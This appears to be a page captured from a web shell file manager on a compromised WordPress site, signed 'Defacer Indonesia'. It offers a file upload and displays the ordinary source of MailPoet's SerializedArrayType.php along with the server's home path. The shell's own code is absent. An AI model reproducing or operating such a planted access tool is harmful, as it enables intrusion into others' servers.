whoami7 - Manager
:
/
home
/
techyfnq
/
www
/
wp-content
/
plugins
/
mailpoet
/
lib
/
Doctrine
/
Types
/
Upload File:
files >> //home/techyfnq/www/wp-content/plugins/mailpoet/lib/Doctrine/Types/SerializedArrayType.php
<?php namespace MailPoet\Doctrine\Types; if (!defined('ABSPATH')) exit; use MailPoetVendor\Doctrine\DBAL\Platforms\AbstractPlatform; use MailPoetVendor\Doctrine\DBAL\Types\Type; class SerializedArrayType extends Type { const NAME = 'serialized_array'; public function getSQLDeclaration(array $fieldDeclaration, AbstractPlatform $platform) { return $platform->getClobTypeDeclarationSQL($fieldDeclaration); } public function convertToDatabaseValue($value, AbstractPlatform $platform) { return \serialize($value); } public function convertToPHPValue($value, AbstractPlatform $platform) { if ($value === null) { return null; } $value = \is_resource($value) ? \stream_get_contents($value) : $value; $val = \unserialize($value); if ($val === \false && $value !== 'b:0;') { return null; } return $val; } public function getName() { return self::NAME; } public function requiresSQLCommentHint(AbstractPlatform $platform) { return true; } }
Copyright ©2021 || Defacer Indonesia